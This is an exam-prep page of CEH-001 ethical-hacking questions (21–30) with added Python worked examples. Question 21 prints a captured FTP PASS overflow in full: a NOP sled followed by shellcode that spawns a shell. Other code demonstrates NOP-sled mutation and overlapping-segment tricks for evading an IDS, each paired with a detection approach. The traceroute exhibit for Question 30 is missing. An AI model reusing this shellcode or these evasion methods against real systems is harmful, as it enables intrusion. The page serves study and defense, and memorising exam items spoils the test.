Exam Details

  • Exam Code
    :CEH-001
  • Exam Name
    :Certified Ethical Hacker (CEH)
  • Certification
    :GAQM certification
  • Vendor
    :GAQM
  • Total Questions
    :878 Q&As
  • Last Updated
    :May 06, 2024

GAQM certification CEH-001 Questions & Answers

  • Question 21:

    Exhibit:

    TCP TTL:50 TOS:0x0 ID:53476 DF

    *****PA* Seq: 0x33BC72AD Ack: 0x110CE81E Win: 0x7D78

    TCP Options => NOP NOP TS: 126045057 105803098

    50 41 53 53 20 90 90 90 90 90 90 90 90 90 90 90 PASS ...........

    90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................

    90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................

    90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................

    90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................

    90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................

    90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................

    90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................

    90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................

    90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................

    90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................

    90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................

    90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................

    90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................

    90 90 90 90 90 90 90 31 C0 31 DB 31 C9 B0 46 CD .......1.1.1..F.

    80 31 C0 31 DB 43 89 D9 41 B0 3F CD 80 EB 6B 5E .1.1.C..A.?...k^

    31 C0 31 C9 8D 5E 01 88 46 04 66 B9 FF FF 01 B0 1.1..^..F.f.....

    27 CD 80 31 C0 8D 5E 01 B0 3D CD 80 31 C0 31 DB '..1..^..=..1.1.

    8D 5E 08 89 43 02 31 C9 FE C9 31 C0 8D 5E 08 B0 .^..C.1...1..^..

    0C CD 80 FE C9 75 F3 31 C0 88 46 09 8D 5E 08 B0 .....u.1..F..^..

    3D CD 80 FE 0E B0 30 FE C8 88 46 04 31 C0 88 46 =.....0...F.1..F

    07 89 76 08 89 46 0C 89 F3 8D 4E 08 8D 56 0C B0 ..v..F....N..V..

    0B CD 80 31 C0 31 DB B0 01 CD 80 E8 90 FF FF FF ...1.1..........

    FF FF FF 30 62 69 6E 30 73 68 31 2E 2E 31 31 76 ...0bin0sh1..11v

    65 6E 67 6C 69 6E 40 6B 6F 63 68 61 6D 2E 6B 61 englin@kocham.ka

    73 69 65 2E 63 6F 6D 0D 0A sie.com..

    =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

    12/09-01:22:31.169534 172.16.1.104:21 -> 207.219.207.240:1882

    TCP TTL:63 TOS:0x0 ID:48231 DF

    *****PA* Seq: 0x110CE81E Ack: 0x33BC7446 Win: 0x7D78

    TCP Options => NOP NOP TS: 105803113 126045057

    35 33 30 20 4C 6F 67 69 6E 20 69 6E 63 6F 72 72 530 Login incorr

    65 63 74 2E 0D 0A ect...

    =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

    12/09-01:22:39.878150 172.16.1.104:21 -> 207.219.207.240:1882

    TCP TTL:63 TOS:0x0 ID:48233 DF

    *****PA* Seq: 0x110CE834 Ack: 0x33BC7447 Win: 0x7D78

    TCP Options => NOP NOP TS: 105803984 126045931

    32 32 31 20 59 6F 75 20 63 6F 75 6C 64 20 61 74 221 You could at

    20 6C 65 61 73 74 20 73 61 79 20 67 6F 6F 64 62 least say goodb

    79 65 2E 0D 0A ye...

    =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

    12/09-01:22:39.880154 172.16.1.104:21 -> 207.219.207.240:1882

    TCP TTL:63 TOS:0x0 ID:48234 DF

    ***F**A* Seq: 0x110CE859 Ack: 0x33BC7447 Win: 0x7D78

    TCP Options => NOP NOP TS: 105803984 126045931

    Given the extract above from the Snort log on a honeypot, what service is being exploited?

    A. FTP

    B. SSH

    C. Telnet

    D. SMTP
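A worked check for the exhibit, added here as an example and not part of the exam page or of Snort: it parses Snort's packet-dump format, reassembles each packet's bytes from the hex columns, names the service from the port-21 endpoint and the FTP command syntax, and applies three hand-rolled heuristics to the PASS argument (length, longest run of 0x90, non-printable bytes). The embedded log is the exhibit with its NOP sled cut down to three dump lines; the thresholds, the function names and the heuristics are assumptions for this example, not Snort rules.

```python
"""Parse a Snort packet dump and flag an FTP PASS overflow.

Added example for this page; it is not code from the exam, from Snort or
from any honeypot.  The log text is the exhibit above with the NOP sled cut
down to three dump lines; thresholds and function names are assumptions.
"""
import re

# Constructed from the exhibit: the attacker's PASS packet (its timestamp
# header is missing in the page's extract, as here) and the server's reply.
SNORT_LOG = """\
TCP TTL:50 TOS:0x0 ID:53476 DF
*****PA* Seq: 0x33BC72AD Ack: 0x110CE81E Win: 0x7D78
TCP Options => NOP NOP TS: 126045057 105803098
50 41 53 53 20 90 90 90 90 90 90 90 90 90 90 90  PASS ...........
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 31 C0 31 DB 31 C9 B0 46 CD  .......1.1.1..F.
80 31 C0 31 DB 43 89 D9 41 B0 3F CD 80 EB 6B 5E  .1.1.C..A.?...k^
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-01:22:31.169534 172.16.1.104:21 -> 207.219.207.240:1882
TCP TTL:63 TOS:0x0 ID:48231 DF
*****PA* Seq: 0x110CE81E Ack: 0x33BC7446 Win: 0x7D78
TCP Options => NOP NOP TS: 105803113 126045057
35 33 30 20 4C 6F 67 69 6E 20 69 6E 63 6F 72 72  530 Login incorr
65 63 74 2E 0D 0A  ect...
"""

HEADER = re.compile(r"^\d\d/\d\d-\d\d:\d\d:\d\d\.\d+ (\S+) -> (\S+)$")
HEX_LINE = re.compile(r"^((?:[0-9A-F]{2}(?:\s|$))+)")
SEPARATOR = re.compile(r"^=\+=\+.*$", re.M)


def parse_snort_dump(text):
    """Return one dict per packet: src, dst (None if no header line) and payload bytes."""
    packets = []
    for block in SEPARATOR.split(text):
        src = dst = None
        hexbytes = []
        for line in block.splitlines():
            line = line.strip()
            m = HEADER.match(line)
            if m:
                src, dst = m.groups()
                continue
            m = HEX_LINE.match(line)
            if m:
                # Snort prints at most 16 bytes per dump line; the cap keeps an
                # ASCII column that happens to start with hex digits out.
                hexbytes.extend(m.group(1).split()[:16])
        if hexbytes:
            packets.append({"src": src, "dst": dst,
                            "payload": bytes.fromhex("".join(hexbytes))})
    return packets


def longest_nop_run(data, nop=0x90):
    """Longest run of consecutive `nop` bytes (0x90 is the x86 single-byte NOP)."""
    best = run = 0
    for b in data:
        run = run + 1 if b == nop else 0
        best = max(best, run)
    return best


def check_ftp_pass(payload, max_len=32, sled_min=16):
    """Heuristics on the PASS argument; the limits are assumptions, not Snort defaults."""
    if not payload.startswith(b"PASS "):
        return []
    arg = payload[5:].split(b"\r\n", 1)[0]
    findings = []
    if len(arg) > max_len:
        findings.append(f"PASS argument is {len(arg)} bytes, limit {max_len}")
    run = longest_nop_run(arg)
    if run >= sled_min:
        findings.append(f"{run} consecutive 0x90 bytes (x86 NOP sled)")
    if any(b < 0x20 or b > 0x7E for b in arg):
        findings.append("non-printable bytes in password")
    return findings


def identify_service(packets):
    """FTP if either endpoint is port 21, or if a payload uses FTP command syntax."""
    for p in packets:
        for endpoint in (p["src"], p["dst"]):
            if endpoint and endpoint.rsplit(":", 1)[1] == "21":
                return "FTP"
    if any(p["payload"].startswith((b"USER ", b"PASS ")) for p in packets):
        return "FTP"
    return "unknown"


def analyze(text):
    """Service name plus the per-packet findings for a dump extract."""
    packets = parse_snort_dump(text)
    return {"service": identify_service(packets),
            "findings": [check_ftp_pass(p["payload"]) for p in packets]}
```

Against the full exhibit the 0x90 run is several hundred bytes rather than 34. The parser tolerates the missing timestamp line on the first packet by reporting src and dst as None, so the service is taken from the reply packet's 172.16.1.104:21 endpoint; the 530 reply code and the PASS command are the same evidence read by eye.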

  • Question 22:

    John has a proxy server on his network which caches and filters web access. He shuts down all unnecessary ports and services. Additionally, he has installed a firewall (Cisco PIX) that will not allow users to connect to any outbound ports. Jack, a network user has successfully connected to a remote server on port 80 using netcat. He could in turn drop a shell from the remote machine. Assuming an attacker wants to penetrate John's network, which of the following options is he likely to choose?

    A. Use ClosedVPN

    B. Use Monkey shell

    C. Use reverse shell using FTP protocol

    D. Use HTTPTunnel or Stunnel on port 80 and 443

  • Question 23:

    A program that defends against a port scanner will attempt to:

    A. Send back bogus data to the port scanner

    B. Log a violation and recommend use of security-auditing tools

    C. Limit access by the scanning system to publicly available ports only

    D. Update a firewall rule in real time to prevent the port scan from being completed

  • Question 24:

    Eric notices repeated probes to port 1080. He learns that the protocol being used is designed to allow a host outside of a firewall to connect transparently and securely through the firewall. He wonders if his firewall has been breached. What would be your inference?

    A. Eric's network has been penetrated by a firewall breach

    B. The attacker is using the ICMP protocol to have a covert channel

    C. Eric has a Wingate package providing FTP redirection on his network

    D. Somebody is using SOCKS on the network to communicate through the firewall

  • Question 25:

    Basically, there are two approaches to network intrusion detection: signature detection and anomaly detection. The signature detection approach utilizes well-known signatures for network traffic to identify potentially malicious traffic. The anomaly detection approach utilizes a previous history of network traffic to search for patterns that are abnormal, which would indicate an intrusion. How can an attacker disguise his buffer overflow attack signature such that there is a greater probability of his attack going undetected by the IDS?

    A. He can use a shellcode that will perform a reverse telnet back to his machine

    B. He can use a dynamic return address to overwrite the correct value in the target machine computer memory

    C. He can chain NOOP instructions into a NOOP "sled" that advances the processor's instruction pointer to a random place of choice

    D. He can use polymorphic shellcode, with a tool such as ADMmutate, to change the signature of his exploit as seen by a network IDS
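The evasion in the last option, as an added example that is not code from the exam, from Snort or from ADMmutate: a literal signature for sixteen 0x90 bytes, a sled rewritten with single-byte instructions that serve the same purpose as NOP in a sled, and a detector that keys on the class of bytes rather than the literal value. ADMmutate additionally hides the shellcode body behind a varying decoder, which is not modelled here; the NOP-equivalent set, the thresholds and the sample packet are assumptions for this example.

```python
"""Mutated NOP sleds versus a literal-byte signature.

Added example for this page; it is not code from the exam, from Snort or
from ADMmutate.  It models only sled substitution.
"""
import random
import re

# Single-byte x86 instructions that can stand in for NOP inside a sled
# because execution simply falls through them (inc/dec of general
# registers, cld, nop).  Which registers a given exploit may clobber depends
# on its shellcode, so this set is an assumption for the example.
NOP_EQUIVALENTS = bytes([0x90, 0x40, 0x41, 0x42, 0x43, 0x47, 0x48, 0x49,
                         0x4A, 0x4B, 0xFC])

# The kind of signature the question assumes the IDS carries: 16+ literal NOPs.
LITERAL_SLED = re.compile(rb"\x90{16,}")


def mutate_sled(payload: bytes, seed: int = 1) -> bytes:
    """Replace every 0x90 with a non-0x90 NOP equivalent (deterministic seed)."""
    rng = random.Random(seed)
    alternatives = [b for b in NOP_EQUIVALENTS if b != 0x90]
    return bytes(rng.choice(alternatives) if b == 0x90 else b for b in payload)


def longest_run(data: bytes, allowed: set) -> int:
    """Length of the longest run of bytes all drawn from `allowed`."""
    best = run = 0
    for b in data:
        run = run + 1 if b in allowed else 0
        best = max(best, run)
    return best


def literal_detect(payload: bytes) -> bool:
    """Signature matcher: fires only on a run of the literal byte 0x90."""
    return LITERAL_SLED.search(payload) is not None


def equivalence_detect(payload: bytes, min_run: int = 16) -> bool:
    """Flag a run of NOP-equivalent bytes instead of literal NOPs."""
    return longest_run(payload, set(NOP_EQUIVALENTS)) >= min_run


def compare(payload: bytes) -> dict:
    """Run both detectors over the original and the mutated payload."""
    mutated = mutate_sled(payload)
    return {
        "literal_on_original": literal_detect(payload),
        "literal_on_mutated": literal_detect(mutated),
        "equivalence_on_original": equivalence_detect(payload),
        "equivalence_on_mutated": equivalence_detect(mutated),
    }


# Constructed sample: the shape of the PASS packet in Question 21, with a
# short sled and only the first four bytes of machine code.
SAMPLE = b"PASS " + b"\x90" * 40 + b"\x31\xC0\x31\xDB" + b"\r\n"
BENIGN = b"PASS correct-horse-battery\r\n"
```

The equivalence detector trades one problem for another: the substitute bytes include the ASCII letters @ through K, so a legitimate field made of a long run of those letters trips it. That false-positive pressure is why sled detection in practice is combined with protocol context (here, an FTP password of that length and content) rather than used alone.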

  • Question 26:

    Neil is closely monitoring his firewall rules and logs on a regular basis. Some of the users have complained to Neil that there are a few employees who are visiting offensive web sites during work hours, without any consideration for others. Neil knows that he has an up-to-date content filtering system and such access should not be authorized. What type of technique might be used by these offenders to access the Internet without restriction?

    A. They are using UDP that is always authorized at the firewall

    B. They are using an older version of Internet Explorer that allows them to bypass the proxy server

    C. They have been able to compromise the firewall, modify the rules, and give themselves proper access

    D. They are using tunneling software that allows them to communicate with protocols in a way it was not intended

  • Question 27:

    Most NIDS systems operate in layer 2 of the OSI model. These systems feed raw traffic into a detection engine and rely on the pattern matching and/or statistical analysis to determine what is malicious. Packets are not processed by the host's TCP/IP stack allowing the NIDS to analyze traffic the host would otherwise discard. Which of the following tools allows an attacker to intentionally craft packets to confuse pattern-matching NIDS systems, while still being correctly assembled by the host TCP/IP stack to render the attack payload?

    A. Defrag

    B. Tcpfrag

    C. Tcpdump

    D. Fragroute
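The ambiguity the correct option relies on, as an added example that is neither fragroute's code nor the exam's: two TCP segments claim the same 32 bytes of a PASS argument with different contents, and the reassembled stream depends on whether a stack keeps the first data it saw for an offset or lets later data overwrite it. A NIDS that rebuilds the stream under one policy pattern-matches a different byte sequence than the host executes. The segments, the rule and the two policy names are constructed for this example; real stacks differ by operating system and by overlap shape, which is the property the tool exploits.

```python
"""Overlapping TCP segments and reassembly policy.

Added example for this page; not fragroute's code and not the exam's.  It
shows how a pattern-matching NIDS and the target host can disagree about
the bytes of one stream when segments overlap with different contents.
"""
import re

# Constructed segments as (stream offset, data).  Both segments at offset 5
# cover the same 32 bytes; one is a harmless-looking password, the other a
# NOP sled of the kind shown in Question 21.
DECOY = b"not-a-real-password-just-noise\r\n"
REAL = b"\x90" * 30 + b"\r\n"
SEGMENTS = [(0, b"PASS "), (5, DECOY), (5, REAL)]

# The NIDS rule: PASS followed by at least sixteen NOP bytes.
SLED_RULE = re.compile(rb"PASS \x90{16,}")

POLICIES = ("favor_old", "favor_new")


def reassemble(segments, policy: str) -> bytes:
    """Rebuild the byte stream from segments.

    'favor_old' keeps the first data seen at each offset; 'favor_new' lets a
    later segment overwrite.  Raises if a gap remains in the stream.
    """
    if policy not in POLICIES:
        raise ValueError(f"unknown policy {policy!r}")
    stream = []
    for off, data in segments:
        end = off + len(data)
        if end > len(stream):
            stream.extend([None] * (end - len(stream)))
        for i, b in enumerate(data):
            if stream[off + i] is None or policy == "favor_new":
                stream[off + i] = b
    if any(b is None for b in stream):
        raise ValueError("gap in stream; segments do not cover it")
    return bytes(stream)


def nids_alerts(stream: bytes) -> bool:
    """Single-policy matcher: does the rule fire on this reconstruction?"""
    return SLED_RULE.search(stream) is not None


def evasion_demo(segments=SEGMENTS) -> dict:
    """What each policy yields and whether the NOP-sled rule fires on it."""
    out = {}
    for policy in POLICIES:
        stream = reassemble(segments, policy)
        out[policy] = {"stream": stream, "alert": nids_alerts(stream)}
    return out


def alerts_under_any_policy(segments=SEGMENTS) -> bool:
    """Defensive variant: evaluate an ambiguous overlap under every policy."""
    return any(nids_alerts(reassemble(segments, p)) for p in POLICIES)
```

If the sensor reassembles with favor_old it sees "PASS not-a-real-password-just-noise" and stays quiet, while a host whose stack lets the retransmission win executes the sled. The last function is the usual countermeasure in miniature: either match under every plausible policy, or know the target's stack and reassemble the way it does.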

  • Question 28:

    What is a primary advantage a hacker gains by using encryption or programs such as Loki?

    A. It allows an easy way to gain administrator rights

    B. It is effective against Windows computers

    C. It slows down the effective response of an IDS

    D. IDS systems are unable to decrypt it

    E. Traffic will not be modified in transit

  • Question 29:

    What is the tool Firewalk used for?

    A. To test the IDS for proper operation

    B. To test a firewall for proper operation

    C. To determine what rules are in place for a firewall

    D. To test the webserver configuration

    E. Firewalk is a firewall auto configuration tool

  • Question 30:

    You have performed the traceroute below and notice that hops 19 and 20 both show the same IP address.

    What can be inferred from this output?

    A. An application proxy firewall

    B. A stateful inspection firewall

    C. A host based IDS

    D. A Honeypot

Tips on How to Prepare for the Exams

Nowadays, certification exams are becoming more important and are required by more and more enterprises when applying for a job. But how do you prepare for the exam effectively? How do you prepare for the exam in a short time with less effort? How do you get an ideal result, and how do you find the most reliable resources? Here on Vcedump.com, you will find all the answers. Vcedump.com provides not only GAQM exam questions, answers and explanations but also complete assistance with your exam preparation and certification application. If you are confused about your CEH-001 exam preparation and GAQM certification application, do not hesitate to visit Vcedump.com to find your solutions.